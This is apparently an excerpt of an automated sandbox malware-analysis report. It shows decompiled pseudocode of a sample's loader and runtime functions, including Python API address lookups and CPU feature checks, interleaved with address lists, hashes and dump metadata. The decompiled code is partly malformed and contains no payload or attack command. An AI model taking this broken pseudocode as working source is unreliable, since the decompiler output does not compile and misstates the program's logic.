				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 0x10)) = __rbx;
				 *((long long*)(_t117 + 0x18)) = _t115;
				 *((long long*)(_t117 + 0x20)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t73 =  *_t66;
				if (_t73 == 0) goto 0x35c5833c;
				_t124 =  *0x35c7b008; // 0x861d85c91f07
				_t111 =  *_t73 ^ _t124;
				asm("dec eax");
				_t75 = _t73[4] ^ _t124;
				asm("dec ecx");
				asm("dec eax");
				if ((_t73[2] ^ _t124) != _t75) goto 0x35c582ae;
				_t77 = _t75 - ( *_t73 ^ _t124) >> 3;
				_t101 =  >  ? _t66 : _t77;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t77) + _t77;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77;
				if (( ==  ? _t66 : ( >  ? _t66 : _t77) + _t77) - _t77 < 0) goto 0x35c5824a;
				_t7 = _t115 + 8; // 0x8
				r8d = _t7;
				E00007FF77FF735C61A54(_t6, _t77, _t111,  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77, _t111, _t115, _t120);
				_t24 = E00007FF77FF735C59468(_t66, _t111);
				if (_t66 != 0) goto 0x35c58272;
				_t104 = _t77 + 4;
				r8d = 8;
				E00007FF77FF735C61A54(_t24, _t77, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E00007FF77FF735C59468(_t66, _t111);
				if (_t129 == 0) goto 0x35c5833c;
				_t123 = _t129 + _t77 * 8;
				_t78 = _t129 + _t104 * 8;
				_t88 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t78 - _t123 + 7 >> 3) == 0) goto 0x35c582ae;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0x35c7b008; // 0x861d85c91f07
				r8d = 0x40;
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0x35c7b008; // 0x861d85c91f07
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0x35c7b008; // 0x861d85c91f07
				asm("dec eax");
				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
				_t98 =  *0x35c7b008; // 0x861d85c91f07
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t78 ^ _t98;
				goto 0x35c5833f;
				return 0xffffffff;
			}
























                                                                                                                                                                                                                              0x7ff735c581a8
                                                                                                                                                                                                                              0x7ff735c581a8
                                                                                                                                                                                                                              0x7ff735c581a8
                                                                                                                                                                                                                              0x7ff735c581ad
                                                                                                                                                                                                                              0x7ff735c581b2
                                                                                                                                                                                                                              0x7ff735c581c0
                                                                                                                                                                                                                              0x7ff735c581c5
                                                                                                                                                                                                                              0x7ff735c581c8
                                                                                                                                                                                                                              0x7ff735c581ce
                                                                                                                                                                                                                              0x7ff735c581d4
                                                                                                                                                                                                                              0x7ff735c581ec
                                                                                                                                                                                                                              0x7ff735c581f2
                                                                                                                                                                                                                              0x7ff735c581f5
                                                                                                                                                                                                                              0x7ff735c581f8
                                                                                                                                                                                                                              0x7ff735c581fb
                                                                                                                                                                                                                              0x7ff735c58201
                                                                                                                                                                                                                              0x7ff735c5820f
                                                                                                                                                                                                                              0x7ff735c58219
                                                                                                                                                                                                                              0x7ff735c5821d
                                                                                                                                                                                                                              0x7ff735c58220
                                                                                                                                                                                                                              0x7ff735c58223
                                                                                                                                                                                                                              0x7ff735c5822a
                                                                                                                                                                                                                              0x7ff735c5822c
                                                                                                                                                                                                                              0x7ff735c5822c
                                                                                                                                                                                                                              0x7ff735c58236
                                                                                                                                                                                                                              0x7ff735c58240
                                                                                                                                                                                                                              0x7ff735c58248
                                                                                                                                                                                                                              0x7ff735c5824a
                                                                                                                                                                                                                              0x7ff735c5824e
                                                                                                                                                                                                                              0x7ff735c5825a
                                                                                                                                                                                                                              0x7ff735c58261
                                                                                                                                                                                                                              0x7ff735c58264
                                                                                                                                                                                                                              0x7ff735c5826c
                                                                                                                                                                                                                              0x7ff735c58279
                                                                                                                                                                                                                              0x7ff735c5827d
                                                                                                                                                                                                                              0x7ff735c58295
                                                                                                                                                                                                                              0x7ff735c58299
                                                                                                                                                                                                                              0x7ff735c5829c
                                                                                                                                                                                                                              0x7ff735c582a4
                                                                                                                                                                                                                              0x7ff735c582a7
                                                                                                                                                                                                                              0x7ff735c582ae
                                                                                                                                                                                                                              0x7ff735c582cd
                                                                                                                                                                                                                              0x7ff735c582d3
                                                                                                                                                                                                                              0x7ff735c582d6
                                                                                                                                                                                                                              0x7ff735c582e9
                                                                                                                                                                                                                              0x7ff735c582f2
                                                                                                                                                                                                                              0x7ff735c582f8
                                                                                                                                                                                                                              0x7ff735c58309
                                                                                                                                                                                                                              0x7ff735c58312
                                                                                                                                                                                                                              0x7ff735c58316
                                                                                                                                                                                                                              0x7ff735c58322
                                                                                                                                                                                                                              0x7ff735c5832b
                                                                                                                                                                                                                              0x7ff735c58336
                                                                                                                                                                                                                              0x7ff735c5833a
                                                                                                                                                                                                                              0x7ff735c58357

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastPrivilegeRelease
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1334314998-0
                                                                                                                                                                                                                              • Opcode ID: 1a15fd9abffc21ba3fb63a974fda2a819aeb16d80e47f17a081c0d7778c4410a
                                                                                                                                                                                                                              • Instruction ID: addda6736b9f9bcee69e7b66efd4f4e50d3cdaba986d0f36ff339ab331c55344
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a15fd9abffc21ba3fb63a974fda2a819aeb16d80e47f17a081c0d7778c4410a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17410163714A5A82EF04DF6AD9141B9B7A1FB48FD8B899432DE4D87B58EE3CC046D300
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C55B9C Relevance: .1, Instructions: 98COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 16%
                                                                                                                                                                                                                              			E00007FF77FF735C55B9C(intOrPtr __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				long long _v16;
				long long _v24;
				intOrPtr _v32;
				long long _v40;
				void* _t29;
				void* _t30;
				void* _t34;
				intOrPtr* _t61;
				intOrPtr* _t62;
				long long _t64;
				intOrPtr* _t84;
				long long _t91;

				_t61 = _t84;
				 *((long long*)(_t61 + 8)) = __rbx;
				 *((long long*)(_t61 + 0x10)) = __rbp;
				 *((long long*)(_t61 + 0x18)) = __rsi;
				 *((long long*)(_t61 + 0x20)) = __rdi;
				r14d = 0;
				 *((long long*)(_t61 - 0x10)) = _t91;
				 *((long long*)(_t61 - 0x18)) = _t91;
				 *((intOrPtr*)(_t61 - 0x20)) = r14d;
				r9d = r9d | 0xffffffff;
				 *((long long*)(_t61 - 0x28)) = _t91;
				E00007FF77FF735C5E704();
				if (_t29 != 0) goto 0x35c55bf5;
				_t30 = E00007FF77FF735C53B18(_t61);
				 *_t61 = 0x2a;
				goto 0x35c55c28;
				if (__rdx == 0) goto 0x35c55c28;
				_v16 = _t91;
				r9d = r9d | 0xffffffff;
				_v24 = _t91;
				_v32 = r14d;
				_v40 = _t91;
				E00007FF77FF735C5E704();
				if (_t30 == 0) goto 0x35c55be5;
				E00007FF77FF735C5D3D0(_t30, _t91 + _t30, __rdx);
				_t64 = _t61;
				if (_t61 != 0) goto 0x35c55c4b;
				E00007FF77FF735C59468(_t61, _t91 + _t30);
				goto 0x35c55cd3;
				_v16 = _t91;
				r9d = r9d | 0xffffffff;
				_v24 = _t91;
				_v32 = __edi;
				_v40 = _t64;
				E00007FF77FF735C5E704();
				if (0 != 0) goto 0x35c55c85;
				_t34 = E00007FF77FF735C53B18(_t61);
				 *_t61 = 0x2a;
				goto 0x35c55c3f;
				if (__rdx == 0) goto 0x35c55cbb;
				_t62 = _t64 + _t64;
				_v16 = _t91;
				_v24 = _t91;
				_v32 = __edi;
				r9d = r9d | 0xffffffff;
				_v40 = _t62;
				 *((char*)(_t62 - 1)) = 0x3d;
				E00007FF77FF735C5E704();
				if (_t34 == 0) goto 0x35c55c75;
				0x35c5f82c(_t91);
				return E00007FF77FF735C59468(_t62, _t64) & 0xffffff00 | _t34 == 0x00000000;
			}















                                                                                                                                                                                                                              0x7ff735c55b9c
                                                                                                                                                                                                                              0x7ff735c55b9f
                                                                                                                                                                                                                              0x7ff735c55ba3
                                                                                                                                                                                                                              0x7ff735c55ba7
                                                                                                                                                                                                                              0x7ff735c55bab
                                                                                                                                                                                                                              0x7ff735c55bb5
                                                                                                                                                                                                                              0x7ff735c55bbb
                                                                                                                                                                                                                              0x7ff735c55bc2
                                                                                                                                                                                                                              0x7ff735c55bc9
                                                                                                                                                                                                                              0x7ff735c55bcd
                                                                                                                                                                                                                              0x7ff735c55bd3
                                                                                                                                                                                                                              0x7ff735c55bd9
                                                                                                                                                                                                                              0x7ff735c55be3
                                                                                                                                                                                                                              0x7ff735c55be5
                                                                                                                                                                                                                              0x7ff735c55bed
                                                                                                                                                                                                                              0x7ff735c55bf3
                                                                                                                                                                                                                              0x7ff735c55bf8
                                                                                                                                                                                                                              0x7ff735c55bfa
                                                                                                                                                                                                                              0x7ff735c55bff
                                                                                                                                                                                                                              0x7ff735c55c03
                                                                                                                                                                                                                              0x7ff735c55c0b
                                                                                                                                                                                                                              0x7ff735c55c14
                                                                                                                                                                                                                              0x7ff735c55c19
                                                                                                                                                                                                                              0x7ff735c55c23
                                                                                                                                                                                                                              0x7ff735c55c30
                                                                                                                                                                                                                              0x7ff735c55c35
                                                                                                                                                                                                                              0x7ff735c55c3b
                                                                                                                                                                                                                              0x7ff735c55c3f
                                                                                                                                                                                                                              0x7ff735c55c46
                                                                                                                                                                                                                              0x7ff735c55c4b
                                                                                                                                                                                                                              0x7ff735c55c50
                                                                                                                                                                                                                              0x7ff735c55c54
                                                                                                                                                                                                                              0x7ff735c55c5c
                                                                                                                                                                                                                              0x7ff735c55c64
                                                                                                                                                                                                                              0x7ff735c55c69
                                                                                                                                                                                                                              0x7ff735c55c73
                                                                                                                                                                                                                              0x7ff735c55c75
                                                                                                                                                                                                                              0x7ff735c55c7d
                                                                                                                                                                                                                              0x7ff735c55c83
                                                                                                                                                                                                                              0x7ff735c55c88
                                                                                                                                                                                                                              0x7ff735c55c8a
                                                                                                                                                                                                                              0x7ff735c55c8e
                                                                                                                                                                                                                              0x7ff735c55c95
                                                                                                                                                                                                                              0x7ff735c55c9a
                                                                                                                                                                                                                              0x7ff735c55c9e
                                                                                                                                                                                                                              0x7ff735c55ca5
                                                                                                                                                                                                                              0x7ff735c55cac
                                                                                                                                                                                                                              0x7ff735c55cb2
                                                                                                                                                                                                                              0x7ff735c55cb9
                                                                                                                                                                                                                              0x7ff735c55cc0
                                                                                                                                                                                                                              0x7ff735c55ced

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: a8fbc6b3629004ad67fd74f90d33f468691901f27a3359db3657c6fd2630455b
                                                                                                                                                                                                                              • Instruction ID: 57a7ae1a14b1cae6b4585ebbb776dc0733a4b06dcc674bb968d9469ca4b3384d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8fbc6b3629004ad67fd74f90d33f468691901f27a3359db3657c6fd2630455b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8331D6B3B09B4351E714EF62A44013EA694AF84FD4F544638EA4D53BD6DF3CD0019714
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C67BE0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                              			E00007FF77FF735C67BE0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x35c8b3ac = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x35c67c41;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x35c8b3ac; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x35c8b3ac = r8d;
				 *0x35c8b3b0 = r8d;
				return 0;
			}







                                                                                                                                                                                                                              0x7ff735c67be0
                                                                                                                                                                                                                              0x7ff735c67be6
                                                                                                                                                                                                                              0x7ff735c67beb
                                                                                                                                                                                                                              0x7ff735c67bf2
                                                                                                                                                                                                                              0x7ff735c67bf2
                                                                                                                                                                                                                              0x7ff735c67bf9
                                                                                                                                                                                                                              0x7ff735c67bfb
                                                                                                                                                                                                                              0x7ff735c67c03
                                                                                                                                                                                                                              0x7ff735c67c09
                                                                                                                                                                                                                              0x7ff735c67c0d
                                                                                                                                                                                                                              0x7ff735c67c13
                                                                                                                                                                                                                              0x7ff735c67c17
                                                                                                                                                                                                                              0x7ff735c67c21
                                                                                                                                                                                                                              0x7ff735c67c2b
                                                                                                                                                                                                                              0x7ff735c67c36
                                                                                                                                                                                                                              0x7ff735c67c3a
                                                                                                                                                                                                                              0x7ff735c67c41
                                                                                                                                                                                                                              0x7ff735c67c4f

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 0676cfb5cd8ee1893cee2f363625c4b1e1fbd2ca4f3fb44c11f0d40148917241
                                                                                                                                                                                                                              • Instruction ID: f6dd9c0c275dcbb98efb080cf42647e92a3d96452fffb538859c9f7546158377
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0676cfb5cd8ee1893cee2f363625c4b1e1fbd2ca4f3fb44c11f0d40148917241
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33F068727186979FDB949F2DA80262977D0F708788FD09039D59D83B14DE3C90609F14
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C4AE84 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2e1f18c0265e767e72b06969e04f09870f744478e15f436d1e55e0e929d25db2
                                                                                                                                                                                                                              • Instruction ID: 8e7a2abffdfdeabc2e58cdb16a090ac38083c89c0baafd0c0114a24839958ade
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e1f18c0265e767e72b06969e04f09870f744478e15f436d1e55e0e929d25db2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31A0026390CD13F1F706AB00ED95470E336EB51B08BD54171C41D510609F7DAA50E324
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C43C40 Relevance: 280.4, APIs: 53, Strings: 107, Instructions: 435libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 16%
                                                                                                                                                                                                                              			E00007FF77FF735C43C40(long long __rax, void* __rcx) {
				void* _t11;
				void* _t12;

				GetProcAddress();
				 *0x35c7bca8 = __rax;
				if (__rax != 0) goto 0x35c43c80;
				E00007FF77FF735C426D0(__rax, __rax, "GetProcAddress", "Failed to get address for Py_DontWriteBytecodeFlag\n", _t11, _t12);
				return 0xffffffff;
			}





                                                                                                                                                                                                                              0x7ff735c43c50
                                                                                                                                                                                                                              0x7ff735c43c56
                                                                                                                                                                                                                              0x7ff735c43c60
                                                                                                                                                                                                                              0x7ff735c43c70
                                                                                                                                                                                                                              0x7ff735c43c7f

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                                                              • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                                                                                                                              • API String ID: 190572456-792081603
                                                                                                                                                                                                                              • Opcode ID: 7228a539e35118d797a0037ff2752d18a7ca09935455f8fe44ca57468ac8e0fe
                                                                                                                                                                                                                              • Instruction ID: 3b930b57881ca8cb6a79fe50e577f6b414b7d754a83ab10c99895a15b7f42d22
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7228a539e35118d797a0037ff2752d18a7ca09935455f8fe44ca57468ac8e0fe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87327BA6A0DB13F0FA15EB04AC94574E3B2AF58F4CBD85635D80E06664FF7DA644F220
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C420E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                              • Opcode ID: a596efb54d53d11b32de6f819edbdb0d5d220827c03d8cf789a2c487555d7ee7
                                                                                                                                                                                                                              • Instruction ID: 113305e5e2f4ea53a37331d4c638e99d8c6c289c61b25251babdbb29e6b6c3e0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a596efb54d53d11b32de6f819edbdb0d5d220827c03d8cf789a2c487555d7ee7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 995104726187A286D634AF22A4181BAF7B1FB98F65F004121EFCE43694DF3CD045DB20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C4CF28 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                                                              			E00007FF77FF735C4CF28(intOrPtr __ecx, void* __edx, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int* _t127;
				void* _t144;
				intOrPtr _t145;
				intOrPtr _t153;
				void* _t172;
				intOrPtr _t175;
				signed int _t176;
				signed int _t177;
				void* _t179;
				void* _t208;
				signed long long _t218;
				signed long long _t219;
				signed long long _t225;
				long long _t227;
				signed int _t234;
				intOrPtr* _t235;
				intOrPtr* _t236;
				signed long long _t245;
				long long _t266;
				signed int* _t279;
				long long _t280;
				void* _t281;
				void* _t282;
				signed long long _t283;
				long long _t295;
				signed int _t304;

